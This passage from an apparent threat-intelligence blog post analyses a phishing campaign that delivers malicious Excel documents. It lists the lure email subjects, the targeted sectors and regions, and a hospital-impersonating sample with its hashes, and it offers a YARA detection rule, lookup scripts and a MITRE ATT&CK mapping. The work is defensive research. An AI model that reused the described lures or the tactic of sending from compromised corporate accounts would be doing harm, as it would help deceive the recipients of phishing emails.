A small number of the malicious documents we retrieved from VirusTotal were uploaded together with the phishing email itself. Analysis of these emails can shed some light on the potential targets of this actor. Due to the limited number of source emails retrieved, it was not possible to identify a clear pattern based on the victims. In the 6 emails we were able to retrieve, recipients included companies in the medical equipment sector, the aluminium sector, facility management, and a vendor of custom-made press machines.

When looking into the sender domains, it appears most emails were sent from legitimate companies. Checking the email addresses against the “Have I Been Pwned”[5] service to see whether any of them were known to be compromised turned up no results. This leaves us to wonder whether the threat actor was able to leverage these accounts during an earlier infection or whether a different party supplied them. Regardless of who compromised the accounts, it appears the threat actor primarily uses legitimate corporate email accounts to initiate the phishing campaign.
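For reference, such checks can be automated. The sketch below queries the public Have I Been Pwned v3 API (which requires an API key) using the requests library; the sender address and user-agent value are placeholders.

import requests

HIBP_URL = "https://haveibeenpwned.com/api/v3/breachedaccount/{account}"

def is_breached(account: str, api_key: str) -> bool:
    """Return True if the account is found in a known breach, False otherwise."""
    response = requests.get(
        HIBP_URL.format(account=account),
        headers={
            "hibp-api-key": api_key,             # the v3 API requires an API key
            "user-agent": "maldoc-triage-check",  # HIBP requires a user agent
        },
        timeout=10,
    )
    if response.status_code == 404:              # 404 means: not found in any breach
        return False
    response.raise_for_status()
    return True

# Usage (hypothetical sender address):
# print(is_breached("sender@example.com", "YOUR_API_KEY"))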

Looking at both sender and recipient, there doesn’t appear to be a pattern we can deduce to identify potential new targets. There does not seem to be a specific sector targeted nor are the sending domains affiliated with each other.

Both the body (content) and subject of the emails relate to a more classic phishing scheme, for example a request to initiate business for which the attachment provides the ‘details’. An overview of observed subjects can be seen below; note that some subjects have been altered by the respective mail gateways:

  • Re: Quotation required/
  • Quote volume and weight for preferred
  • *****SPAM***** FW:Offer_10044885_[companyname]_2_09_2020.xlsx*
  • [SUSPECTED SPAM] Alternatives for Request*
  • Purchase Order Details
  • Quotation Request

Figure 17 – Sample phishing email

This method of enticing users to open the attachments is nothing new and does not provide much additional information to determine whether the campaign targets any specific organisation or vertical.

However, leveraging public submissions of the maldocs through VirusTotal, we clustered over 200 documents, which allowed us to rank 27 countries by submission count without differentiating between uploads possibly performed through VPNs. As shown in Figure 18, areas such as the United States, Czech Republic, France, Germany, as well as China, account for the majority of targeted regions.

Figure 18 – Geographical distribution of VT submissions

When analysing the initial documents for targeted regions, we primarily identified English, Spanish, Chinese and Turkish language-based images.

Figure 19 – Maldoc content in Chinese, Turkish, Spanish and English respectively

Some images, however, contained an interesting detail: some of the document properties are in Cyrillic, regardless of the image’s primary language.

Although the Cyrillic Word settings were observed in multiple images, a new maldoc detected at the time of writing this blog post piqued our interest, as it appears to be the first one to explicitly impersonate a healthcare sector member (“Ohiohealth Hardin Memorial Hospital”), as can be observed in Figure 20. Note also the settings described above: СТРАНИЦА 1 ИЗ 1, which means “page 1 of 1”.

Figure 20 – Maldoc content impersonating “Ohiohealth Hardin Memorial Hospital” with Cyrillic Word settings

This Microsoft Excel document has the following details:

Filename: 새로운 주문 _2608.xlsm (Korean: New order _2608.xlsm)
MD5: 551b5dd7aff4ee07f98d11aac910e174
SHA256: 45cab564386a568a4569d66f6781c6d0b06a9561ae4ac362f0e76a8abfede7bb
File Size: 5.77 KB (5911 bytes)
Earliest Contents Modification: 2020-06-22 14:01:46

While the template from said hospital may simply have been discovered on the web and subsequently used by the threat actor, this surprising change in modus operandi does appear to align with the actor’s constant evolution observed since we started tracking this campaign.

 

Assessment

Based on the analysis, NVISO assesses the following:

  • The threat actor observed has worked out a new method of creating malicious Office documents that at least slightly reduces detection;
  • The actor is likely experimenting with and evolving the methodology by which the malicious Office documents are created, potentially automating the workflow;
  • While the targeting seems rather limited for now, it is possible these first runs were intended for testing rather than a full-fledged campaign;
  • A recent uptick in detections submitted to VirusTotal suggests the actor may be ramping up their operations;
  • While the approach to creating the malicious documents is unique, the methodologies for payload delivery as well as the actual payloads are not, and should be stopped or detected by modern technologies;
  • Of interest is a recent blog post published by Xavier Mertens on the SANS diary, Tracking A Malware Campaign Through VT[6]. It appears another security researcher has also been tracking these documents; however, they extracted the VBA code from the maldocs and uploaded that portion. These extracted templates correspond to the PowerShell variant of downloading the next stage.

In conclusion, NVISO assesses that this specific malicious Excel document creation technique is likely to be observed more in the wild, though it may be missed by email gateways or analysts, as payload analysis is often considered more interesting. However, blocking and detecting these types of novelties, such as the maldoc creation technique described in this blog post, enables organizations to detect and respond more quickly should an uptick or similar campaign occur. The recommendations section provides a YARA rule and indicators as a means of detection.

Recommendations

  • Filter email attachments and emails sent from outside your organization;
  • Implement robust endpoint detection and response (EDR) defenses;
  • Provide phishing awareness training and perform phishing exercises.

 

YARA

We provide the following rule to implement in your detection mechanisms and for use in further hunting missions.

rule xlsm_without_metadata_and_with_date {
    meta:
        description = "Identifies .xlsm files created with EPPlus"
        author = "NVISO (Didier Stevens)"
        date = "2020-07-12"
        reference = "http://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers"
        tlp = "White"
    strings:
        $opc = "[Content_Types].xml"    // OPC package marker
        $ooxml = "xl/workbook.xml"    // OOXML spreadsheet workbook part
        $vba = "xl/vbaProject.bin"    // embedded VBA project
        $meta1 = "docProps/core.xml"    // document metadata part, missing from the maldocs
        $meta2 = "docProps/app.xml"    // document metadata part, missing from the maldocs
        $timestamp = {50 4B 03 04 ?? ?? ?? ?? ?? ?? 00 00 21 00}    // ZIP local file header with last-modification timestamp 1980-01-01 00:00:00
    condition:
        uint32be(0) == 0x504B0304 and ($opc and $ooxml and $vba)
        and not (any of ($meta*) and $timestamp)
}

This rule will match documents with VBA code created with EPPlus, even if they are not malicious. We had only a couple of false positives with this rule (documents created with other benign software), and quite a few corrupt samples (incomplete ZIP files).
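As a usage example, the rule can be compiled and run against a set of samples with the yara-python bindings; the rule file name below is a placeholder, and the sample name is the first document of this campaign.

import yara

# Compile the rule above, saved for example as epplus_xlsm.yar
rules = yara.compile(filepath="epplus_xlsm.yar")

# Scan a sample and print the names of matching rules
matches = rules.match(filepath="Scan Order List.xlsm")
print([match.rule for match in matches])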

 

INDICATORS OF COMPROMISE (IOCs)

Indicators of compromise can be found on our Github page here.

MITRE ATT&CK MAPPING

  • Initial Access:
    • T1566.001 Phishing: Spearphishing Attachment
  • Execution:
    • T1204.002 User Execution: Malicious File
  • Defense Evasion:
    • T1140 Deobfuscate/Decode Files or Information
    • T1036.005 Masquerading: Match Legitimate Name or Location
    • T1027.001 Obfuscate Files or Information: Binary Padding
    • T1027.002 Obfuscate Files or Information: Software Packing
    • T1027.003 Obfuscate Files or Information: Steganography
    • T1055.001 Process Injection: DLL Injection
    • T1055.002 Process Injection: PE Injection
    • T1497.001 Virtualization/Sandbox Evasion: System Checks

 

Authors

This blog post was created based on the collaborative effort of:
